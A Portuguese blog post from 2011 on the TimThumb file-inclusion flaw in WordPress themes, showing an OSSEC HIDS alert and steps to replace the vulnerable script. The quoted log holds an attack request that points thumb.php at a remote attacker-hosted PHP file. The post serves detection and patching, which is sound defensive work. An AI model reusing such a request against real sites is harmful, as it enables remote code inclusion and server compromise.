WordPress: Corrigindo vulnerabilidade no timthumb
11 de Novembro de 2011, 0:00 - sem comentários ainda<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/internetera-net-wordpress-eye-wallpaper.jpg"><img class="alignright size-medium wp-image-2310" title="internetera-net-wordpress-eye-wallpaper" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/internetera-net-wordpress-eye-wallpaper-300x225.jpg" height="225" alt="" width="300" /></a>Sugiu uma vulnerabilidade no WordPress classificada como alta, a falha foi encontrada no script timthumb presente na maioria dos templates e permite a inclusão de arquivos maliciosos.</p> <p>O Ossec alerta e bloqueia as tentativas de ataque com o objetivo de explorar está vulnerabilidade se a active-response foi habilitada.</p> <blockquote><p> OSSEC HIDS Notification.<br /> 2011 Nov 11 03:29:38</p> <p>Received From: acme->/var/log/httpd/www.acme.com-access_log<br /> Rule: 31151 fired (level 10) -> “Mutiple web server 400 error codes from same source ip.”<br /> Portion of the log(s):</p> <p>xx.xxx.xxx.xxx – - [11/Nov/2011:04:29:25 -0200] “GET //wp-content/themes/Quadro/thumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1″ 404 232 “-” “Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4″ </p></blockquote> <p>Para corrigi-la é necessário executar os seguintes passos:</p> <p>1 . Localizar se o arquivo timthumb.php, thumb.php ou similar que encontra-se no diretório template localizado em <em><strong>/wp-content/themes</strong></em>;</p> <p>2. Em caso afirmativo substituir todo o código pela nova versão[1]<br /> <br /> [1] code.google.com/p/timthumb/source/browse/trunk/timthumb.php</p> <p><strong>Maiores informações:</strong></p> <p>blog.ptservidor.pt/seguranca/alerta-de-seguranca-vulnerabilidade-timthumb/<br /> blog.spiderlabs.com/2011/11/wordpress-timthumb-attacks-rising.html<br /> markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/</p> <div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=2302&#38;lang=pt-br" class="crp_title">Usando o http-wp-plugins do Nmap para detectar plugins do WordPress</a></li><li><a href="http://blog.alexos.com.br/?p=2180&#38;lang=pt-br" class="crp_title">Nessus Viewer</a></li><li><a href="http://blog.alexos.com.br/?p=2770&#38;lang=pt-br" class="crp_title">Conheça o projeto Muffin</a></li><li><a href="http://blog.alexos.com.br/?p=2650&#38;lang=pt-br" class="crp_title">Ossec HIDS – Bloqueando o ZmEu bot e outros Web scanners</a></li><li><a href="http://blog.alexos.com.br/?p=2555&#38;lang=pt-br" class="crp_title">Eventos Segurança da Informação – 2o. semestre 2011</a></li></ul></div>
